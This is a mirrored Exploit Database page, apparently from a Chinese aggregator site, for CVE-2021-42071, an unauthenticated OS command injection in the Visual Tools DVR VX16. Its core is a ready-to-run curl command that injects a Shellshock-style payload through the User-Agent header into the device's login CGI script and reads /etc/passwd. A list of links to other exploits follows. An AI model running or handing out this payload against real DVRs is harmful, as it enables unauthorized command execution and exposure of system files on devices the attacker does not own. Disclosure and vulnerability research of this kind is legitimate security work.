Visual Tools DVR VX16 4.2.28.0 – OS Command Injection (Unauthenticated)

Exploit Database
16 阅读

作者： Andrea D\'Ubaldo

日期： 2021-07-06
类别：
- webapps
平台：
- multiple
来源：https://www.exploit-db.com/exploits/50098/

# Exploit Title: Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated)
# Date: 2021-07-05
# Exploit Author: Andrea D'Ubaldo
# Vendor Homepage: https://visual-tools.com/
# Version: Visual Tools VX16 v4.2.28.0
# Tested on: VX16 Embedded Linux 2.6.35.4.
# CVE: CVE-2021-42071
# Reference: https://www.swascan.com/security-advisory-visual-tools-dvr-cve-2021-42071/

# An unauthenticated remote attacker can inject arbitrary commands to CGI script that can result in remote command execution.

curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http:/DVR_ADDR/cgi-bin/slogin/login.py

last Exploits
Visual Tools DVR VX16 4.2.28.0 – OS Command Injection (Unauthenticated)的更多信息

JomSocial 1.8.8 – Arbitrary File Upload：
phpAcounts 0.5.3 – SQL Injection：
NewsBee CMS 1.4 – ‘home-text-edit.php’ SQL Injection：
Ero Auktion 2.0 – ‘news.php’ SQL Injection：
Trend Micro OfficeScan 11.0/XG (12.0) – Code Execution / Memory Corruption：
Blood Donor Management System v1.0 – Stored XSS：
Tagstoo 2.0.1 – Persistent Cross-Site Scripting：
CubeCart < 3.0.12 - Multiple Vulnerabilities：